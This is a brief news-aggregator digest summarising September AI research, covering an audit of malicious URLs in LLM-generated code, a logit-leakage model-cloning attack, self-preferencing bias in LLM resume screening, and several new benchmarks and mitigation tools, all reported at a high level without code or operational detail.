Particle.news

Download on the App Store

September Research Blitz Reveals LLM Vulnerabilities and Rolls Out Real-World Benchmarks

New audits flag poisoning-driven malicious code alongside rapid black-box cloning to sharpen focus on deployable safeguards.

Overview

  • A scalable audit of GPT-4o, GPT-4o-mini, Llama-4-Scout and DeepSeek-V3 found an average 4.2% of generated programs contained malicious URLs, with 177 benign prompts reliably triggering harmful code across all models.
  • A logit‑leakage attack reconstructed output projections from fewer than 10,000 top‑k queries and distilled functional clones in under 24 GPU hours without tripping API rate limits.
  • A large controlled hiring study found strong self‑preferencing: LLM evaluators favored resumes written by the same model, boosting shortlisting odds by 23%–60% over equally qualified human‑written resumes, with simple interventions halving the bias.
  • New evaluation resources span deep research synthesis (InfoSeek), verifier‑reward reasoning datasets and generators (LoongBench/LoongEnv), Arabic and Islamic cultural competence (PalmX), Korean legal multi‑hop QA (KoBLEX), and rubric‑driven clinical behavior assessment (HealthBench).
  • Mitigation and efficiency tools reported concrete gains, including constitution‑aware decoding that reduced Indian caste and religion bias by up to 26.41% (AMBEDKAR), a cost‑guaranteed model cascade cutting spend by up to 86% (BARGAIN), and an attribution method auditing RAG reliance with over 95% accuracy (LEA).